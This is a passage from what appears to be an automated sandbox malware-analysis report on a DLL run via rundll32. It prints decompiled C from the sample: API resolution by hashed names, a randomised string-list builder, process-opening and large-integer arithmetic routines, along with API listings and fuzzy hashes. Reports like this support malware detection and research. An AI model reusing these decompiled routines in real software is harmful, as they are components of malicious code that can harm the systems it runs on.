									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04441ADF(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x044471d1
0x044471d5
0x04447297
0x044471db
0x044471db
0x044471e0
0x044471f3
0x044471f5
0x044471fa
0x04447202
0x04447209
0x0444720d
0x04447210
0x0444728f
0x04447290
0x04447212
0x04447212
0x04447217
0x0444721f
0x04447223
0x04447226
0x00000000
0x04447228
0x04447228
0x0444722d
0x04447235
0x04447239
0x0444723c
0x00000000
0x0444723e
0x0444723e
0x04447243
0x0444724b
0x0444724f
0x04447252
0x00000000
0x04447254
0x04447254
0x04447259
0x04447261
0x04447265
0x04447268
0x00000000
0x0444726a
0x04447270
0x04447275
0x0444727c
0x04447283
0x04447286
0x00000000
0x04447288
0x0444728b
0x0444728b
0x04447286
0x04447268
0x04447252
0x0444723c
0x04447226
0x04447210
0x044472a5

APIs

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,04445DEC,?,?,?,?,00000000,00000000), ref: 044471E7
GetProcAddress.KERNEL32(00000000,7243775A), ref: 04447209
GetProcAddress.KERNEL32(00000000,614D775A), ref: 0444721F
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04447235
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0444724B
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04447261

Part of subcall function 04441ADF: memset.NTDLL ref: 04441B5E

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 412ae1879fb76cf178d2fd86f228a7c0942f4a362183b3f70a7658750b4b8f08
Instruction ID: 0b51b5621809596b9fecb07bf1ae2dc50b8699993392e51bfe79c8aa94e2f83d
Opcode Fuzzy Hash: 412ae1879fb76cf178d2fd86f228a7c0942f4a362183b3f70a7658750b4b8f08
Instruction Fuzzy Hash: FC214DB560064AAFFB50DFA9C844E67B7ECFB84244B054526F809D7742E739F9029B60

Uniqueness

Uniqueness Score: -1.00%

Function 7030D5C0, Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

APIs

___initconout.LIBCMTD ref: 7030D5E4

Part of subcall function 703105E0: CreateFileA.KERNEL32(703328D0,40000000,00000003,00000000,00000003,00000000,00000000,?,7030D5E9), ref: 703105F9

GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 7030D669
WideCharToMultiByte.KERNEL32(00000000), ref: 7030D670
WriteConsoleA.KERNEL32(7037D324,00000000,?,?,00000000), ref: 7030D697

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: 443e29e7490ea6dd7aa682db8373dd10660044937762ca07e7d63425afb004a7
Instruction ID: a03bb1749420a404cc4b8da1e206867a8d91a1b0e385514a049622f30c127937
Opcode Fuzzy Hash: 443e29e7490ea6dd7aa682db8373dd10660044937762ca07e7d63425afb004a7
Instruction Fuzzy Hash: AF21EF76A01208AFE710DB56CC89B9E33FEAB08310FB0022DF50A960D0DB75E985DF56

Uniqueness

Uniqueness Score: -1.00%

Function 04444091, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E04444091(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04441EF5(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E044430D1(_v16);
								goto L37;
							}
							_t103 = E04441EF5((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x444a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x04444098
0x0444409f
0x044440a4
0x044440a7
0x044440ae
0x044440b1
0x044440b4
0x044440bb
0x044440be
0x04444212
0x04444214
0x04444216
0x0444421b
0x0444421b
0x044440c4
0x044440c7
0x044440ca
0x044440cc
0x044440cc
0x044440d0
0x00000000
0x00000000
0x044440d4
0x04444100
0x04444105
0x04444107
0x04444107
0x0444410a
0x0444410d
0x0444410d
0x0444410f
0x00000000
0x044440da
0x044440dc
0x044440fb
0x044440fb
0x04444112
0x04444112
0x04444113
0x04444113
0x04444116
0x00000000
0x00000000
0x00000000
0x04444116
0x044440e0
0x04444127
0x0444412b
0x04444205
0x04444207
0x04444207
0x04444208
0x0444420b
0x00000000
0x0444420b
0x04444145
0x04444149
0x04444201
0x00000000
0x04444201
0x0444414f
0x04444152
0x04444156
0x0444415c
0x0444415f
0x044441f7
0x044441f7
0x00000000
0x044441fd
0x0444416a
0x04444173
0x04444187
0x0444418e
0x044441a3
0x044441a9
0x044441b1
0x00000000
0x00000000
0x00000000
0x00000000
0x044441b3
0x044441b3
0x044441b3
0x044441ba
0x044441c2
0x00000000
0x00000000
0x044441c4
0x044441cd
0x00000000
0x00000000
0x00000000
0x044441cf
0x044441d1
0x044441d4
0x044441d4
0x044441d7
0x044441db
0x044441de
0x044441e4
0x044441e7
0x044441ee
0x00000000
0x0444416a
0x044440e5
0x044440f0
0x044440f3
0x044440f5
0x044440f5
0x044440f8
0x044440fa
0x00000000
0x044440fa
0x044440d4
0x0444411a
0x0444411f
0x04444121
0x04444121
0x04444124
0x04444124
0x00000000

APIs

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

lstrcpy.KERNEL32(69B25F45,00000020), ref: 0444418E
lstrcat.KERNEL32(69B25F45,00000020), ref: 044441A3
lstrcmp.KERNEL32(00000000,69B25F45), ref: 044441BA
lstrlen.KERNEL32(69B25F45), ref: 044441DE

Strings

, xrefs: 04444127

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 4a3a3ae8c56a16892d02870a062fedf8964bcaf472d7ed4115fc57795fe61488
Instruction ID: a6b1c601e08bc5c6a796e67aef76eb9667491e987819d1f606ce3db37f50b6d3
Opcode Fuzzy Hash: 4a3a3ae8c56a16892d02870a062fedf8964bcaf472d7ed4115fc57795fe61488
Instruction Fuzzy Hash: 9B51C071A00218EBEF20CF99C9887AEFBB5FF95355F05805BE815AB202C770BA51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 044445D9, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044445D9(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x444a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x444a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x444a2b0 = _t6;
				 *0x444a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x444a2ac = _t7;
				if(_t7 == 0) {
					 *0x444a2ac =  *0x444a2ac | 0xffffffff;
				}
				return 0;
			}

0x044445e1
0x044445e9
0x044445ee
0x00000000
0x0444463b
0x044445f0
0x044445f8
0x04444638
0x00000000
0x04444638
0x044445fa
0x044445ff
0x04444611
0x04444616
0x0444461c
0x04444624
0x04444629
0x0444462b
0x0444462b
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,044424F5,?,?,00000001), ref: 044445E1
GetVersion.KERNEL32(?,00000001), ref: 044445F0
GetCurrentProcessId.KERNEL32(?,00000001), ref: 044445FF
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 0444461C
GetLastError.KERNEL32(?,00000001), ref: 0444463B

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: ee3a75602851a514e6e749cecf1b28bdaa4c94a74fdcd77cad390803d2e456e7
Instruction ID: ad03c946e6818bc1489879626a8c9f3a9b6129eec3aa248a4be99d00404fe3a5
Opcode Fuzzy Hash: ee3a75602851a514e6e749cecf1b28bdaa4c94a74fdcd77cad390803d2e456e7
Instruction Fuzzy Hash: 6DF0F4B87853019FFBA08F74A90AB167BA4F7C4B41F00441AE616E66C0EB7D9801AF19

Uniqueness

Uniqueness Score: -1.00%

Function 703067F3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

__isatty.LIBCMTD ref: 703068D9
__getbuf.LIBCMTD ref: 703068E9
__write.LIBCMTD ref: 70306971

Strings

RB/p, xrefs: 7030696D, 703068D5, 703068D8, 70306970

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: __getbuf__isatty__write
String ID: RB/p
API String ID: 2861569966-1900480714
Opcode ID: 2ef58a68f8e8e03e0236e2c08d39ff8166b2226da2fce9d757d12db822a133de
Instruction ID: a927a7eea3c8862c593b1fa872eef3db48f58d7a88165cf65044f6241e5311d3
Opcode Fuzzy Hash: 2ef58a68f8e8e03e0236e2c08d39ff8166b2226da2fce9d757d12db822a133de
Instruction Fuzzy Hash: C551B575B01208EFDB05CF94D491A9DBBB6FF88324F15C298E4866B399D730EA81CB44

Uniqueness

Uniqueness Score: -1.00%

Function 702F66F8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMTD ref: 702F670D

Part of subcall function 702F9BB0: __amsg_exit.LIBCMTD ref: 702F9BC6

__getptd.LIBCMTD ref: 702F671B
___DestructExceptionObject.LIBCMTD ref: 702F6788

Strings

csm, xrefs: 702F672C

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: __getptd$DestructExceptionObject__amsg_exit
String ID: csm
API String ID: 128116785-1018135373
Opcode ID: a0e78d9c6de780c7259fccead05293aefa9a5d2e2cb6fa0972fbd8971d37345b
Instruction ID: 79eb4a3e047bcb207fcbb038c62e9dd6abe55bfe46dc4528163ce5b6413957b3
Opcode Fuzzy Hash: a0e78d9c6de780c7259fccead05293aefa9a5d2e2cb6fa0972fbd8971d37345b
Instruction Fuzzy Hash: 9811E67A9002099FCB04DF50D558A9EF7B6EF48299F508068E80A5B341D731FA91CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04442B49, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E04442B49(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x444a2d4; // 0xefd5a8
					_t5 = _t102 + 0x444b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x44492b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x444a2d4; // 0xefd5a8
												_t28 = _t108 + 0x444b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x444a2d4; // 0xefd5a8
														_t33 = _t78 + 0x444b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x04442b4e
0x04442b57
0x04442b58
0x04442b5c
0x04442b62
0x04442b68
0x04442b71
0x04442b77
0x04442b81
0x04442b83
0x04442b89
0x04442b8e
0x04442b99
0x04442ba1
0x04442ba4
0x04442cc7
0x04442baa
0x04442baa
0x04442bb7
0x04442bbd
0x04442bc3
0x04442bc7
0x04442bcd
0x04442bda
0x04442bde
0x04442be4
0x04442be7
0x04442bed
0x04442bf3
0x04442bf9
0x04442bfc
0x04442bff
0x04442c05
0x04442c0e
0x04442c14
0x04442c15
0x04442c18
0x04442c19
0x04442c1a
0x04442c22
0x04442c23
0x04442c24
0x04442c26
0x04442c2a
0x04442c2e
0x00000000
0x00000000
0x04442c34
0x04442c3d
0x04442c43
0x04442c4d
0x04442c51
0x04442c53
0x04442c60
0x04442c64
0x04442c6c
0x04442c71
0x04442c83
0x04442c85
0x04442c8b
0x04442c8b
0x04442c94
0x04442c94
0x04442c96
0x04442c9c
0x04442c9c
0x04442c9f
0x04442ca5
0x04442ca8
0x04442cb1
0x00000000
0x00000000
0x00000000
0x04442cb1
0x04442c05
0x04442bff
0x04442be7
0x04442cb7
0x04442cb7
0x04442cbd
0x04442cbd
0x04442cc3
0x04442cc3
0x04442ccc
0x04442cd2
0x04442cd2
0x04442b8e
0x04442cdb

APIs

SysAllocString.OLEAUT32(044492B0), ref: 04442B99
lstrcmpW.KERNEL32(00000000,0076006F), ref: 04442C7B
SysFreeString.OLEAUT32(00000000), ref: 04442C94
SysFreeString.OLEAUT32(?), ref: 04442CC3

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 7ac78f5bd042b93dac0743ef8393c41bbb15d3bbefd6015a3475583471fab085
Instruction ID: ab9ed9b7c749c4a572225248abf01bdbdd34bc9fcf4c7a489eedc0c14c4fef99
Opcode Fuzzy Hash: 7ac78f5bd042b93dac0743ef8393c41bbb15d3bbefd6015a3475583471fab085
Instruction Fuzzy Hash: 77512975E0051AEFDF00DFA8C4888AEB7B9FFC9744B148599E915AB311D771AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04447309, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0444734A
SysFreeString.OLEAUT32(00000000), ref: 0444742D

Part of subcall function 04442B49: SysAllocString.OLEAUT32(044492B0), ref: 04442B99

SafeArrayDestroy.OLEAUT32(?), ref: 04447481
SysFreeString.OLEAUT32(?), ref: 0444748F

Part of subcall function 044454BE: Sleep.KERNEL32(000001F4), ref: 04445506

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 2f53ae196212b51415225a56754a2fefa7d34f4939556ab148962f8a74bdafef
Instruction ID: cbd82e6dab9b4020ea7d695f51d42add6674ea22024b17a5b5ddcdc49b6e8ae9
Opcode Fuzzy Hash: 2f53ae196212b51415225a56754a2fefa7d34f4939556ab148962f8a74bdafef
Instruction Fuzzy Hash: AF512C76A00249AFEF10DFA4D8858AEBBB6FFC8340B148829E515AB210D735AD46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0444551E, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0444551E(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E0444289D(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E044416E8(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04441F0A(_t101,  &_v428, _a8, _t96 - _t81);
					E04441F0A(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E044416E8(_t101,  &E0444A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E044416E8(_a16, _a4);
						E04442791(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04447DDC();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04447DD6();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04443400(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E044416B6(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E044443DC(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0444A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x04445521
0x0444552d
0x04445533
0x04445538
0x0444553c
0x044456ae
0x044456b2
0x044456b2
0x04445542
0x04445546
0x0444554c
0x0444554d
0x04445558
0x0444555e
0x04445563
0x04445566
0x04445580
0x0444558f
0x0444559b
0x044455a5
0x044455aa
0x044455ac
0x044455af
0x04445666
0x0444566c
0x0444567d
0x04445690
0x044456a6
0x00000000
0x044456ab
0x044455b8
0x044455bf
0x044455c3
0x044455c9
0x044455cb
0x044455cd
0x044455cf
0x044455d1
0x044455db
0x044455e0
0x044455e2
0x044455e4
0x044455e5
0x044455e6
0x044455e7
0x044455ee
0x044455f5
0x044455f8
0x044455f8
0x044455c5
0x044455c5
0x044455c5
0x04445600
0x04445608
0x04445614
0x04445619
0x04445619
0x0444561e
0x00000000
0x00000000
0x04445620
0x04445623
0x04445630
0x00000000
0x00000000
0x04445632
0x04445632
0x0444563f
0x04445619
0x0444561e
0x00000000
0x00000000
0x00000000
0x0444561e
0x04445649
0x0444564c
0x0444564f
0x04445656
0x04445656
0x04445663
0x00000000
0x04445663
0x0444554f
0x04445553
0x04445554
0x04445556
0x00000000
0x00000000
0x00000000
0x04445556
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 044455D1
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 044455E7
memset.NTDLL ref: 04445690
memset.NTDLL ref: 044456A6

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 79f030b59aa2d739d4d869f6f13a3b777eb5ef5e480fdafe325e0e6a94acfd35
Instruction ID: 71f5d40edbb9774870fc425c4fc0e492bccd2af4f4b5a86b60bb41da87addd12
Opcode Fuzzy Hash: 79f030b59aa2d739d4d869f6f13a3b777eb5ef5e480fdafe325e0e6a94acfd35
Instruction Fuzzy Hash: A941AD72A00219BBFF109FA9CC84BEE7775AF85314F10456AFA09A7281DB70AE458B40

Uniqueness

Uniqueness Score: -1.00%

Function 044430E6, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E044430E6(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
